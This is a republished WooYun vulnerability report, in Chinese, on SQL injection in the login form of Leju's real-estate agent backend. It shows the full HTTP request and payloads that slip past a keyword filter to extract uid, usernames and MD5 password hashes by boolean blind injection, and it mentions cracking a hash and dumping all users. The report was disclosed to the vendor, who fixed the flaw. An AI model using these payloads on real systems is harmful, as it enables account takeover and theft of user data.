新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

admin 2017年4月17日04:48:17评论304 views字数 235阅读0分47秒阅读模式
摘要

2016-04-05: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-06: 厂商已经修复漏洞并主动公开,细节向公众公开

漏洞概要 关注数(44) 关注此漏洞

缺陷编号: WooYun-2016-191656

漏洞标题: 新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

相关厂商: leju.com

漏洞作者: 蓝冰

提交时间: 2016-04-05 14:58

修复时间: 2016-04-06 10:41

公开时间: 2016-04-06 10:41

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经修复

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

18人收藏


漏洞详情

披露状态:

2016-04-05: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-06: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt

详细说明:

http://j.m.leju.com/login

经纪人后台登录口

code 区域
POST /login/jjhcheck HTTP/1.1
Host: j.m.leju.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://j.m.leju.com/login
Content-Length: 133
Cookie: PHPSESSID=idtt1n80ik24sqk8pkpdpi1ia1;
Connection: keep-alive

username=1&password=1&city=sh

username参数存在注入点

过滤的比较凶狠 = < > from || && like in等都过滤了

新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

被检测到了

接着

username=1'or'1&password=1&city=sh

表示从所有用户当中找有没有密码为1的用户 结果成功了

接着找出用户密码字段

code 区域
username=1' or 1 or uid and'1&password=1&city=sh
username=1' or 1 or username and'1&password=1&city=sh
username=1' or 1 or password and'1&password=1&city=sh

均返回

code 区域
{"status":1,"msg":null}

字段不存在则返回

code 区域
{"status":1,"msg":"/u7528/u6237/u540d/u4e0d/u5b58/u5728"}

接着确定一个uid

code 区域
username=1'  or 1 and uid between 9995 and 9995 and'1&password=1&city=sh

返回正常 表示存在uid为9995的用户

接着同理注出用户名和密码

新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

106正常107异常所以第一位ascii码为106

注出用户名后接着注出密码

新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

解密md5后成功登录

新浪乐居之看我如何绕过过滤注入(可dump经纪人用户库)

运气不好一个空号

写个脚本轻轻松松dump所有用户

漏洞证明:

已证明

修复方案:

过滤

版权声明:转载请注明来源 蓝冰@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-04-06 09:15

厂商回复:

谢谢蓝冰对乐居的关注,我们会尽快修复

最新状态:

2016-04-06:已修复


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

50%

0%

0%

50%

0%


评价

  1. 2016-04-06 11:14 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

    1

    66666

  2. 2016-04-06 11:23 | ucifer ( 普通白帽子 | Rank:231 漏洞数:74 | 萌萌哒~)

    1

    蓝冰肯定有绕过各种过滤的cheat sheet

  3. 2016-04-06 11:41 | 蓝冰 ( 普通白帽子 | Rank:725 漏洞数:61 | -.-)

    1

    @ucifer 此号已经被黑了 来群里决斗吧 hack by y4

  4. 2016-04-06 12:27 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

    1

    真6

  5. 2016-04-06 12:39 | 夏殇 ( 实习白帽子 | Rank:44 漏洞数:26 | 不忘初心,方得始终。)

    1

    新浪乐居和新浪是啥关系 ~~

  6. 2016-04-06 15:14 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白,外墙涂料,外墙保温,...)

    1

    为什么你这么牛?

  7. 2016-04-06 20:12 | 集与成 ( 路人 | Rank:6 漏洞数:2 | 大隐隐于市)

    1

    牛牛牛,你把洞都挖完了,我们怎么活

  8. 2016-04-08 10:43 | havy ( 实习白帽子 | Rank:67 漏洞数:21 | 开开心心写代码)

    1

    为什么你这么牛?

  9. 2016-04-19 20:22 | 我在不想理你 ( 普通白帽子 | Rank:203 漏洞数:60 | 人生路漫漫)

    0

    你好6啊 大神

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin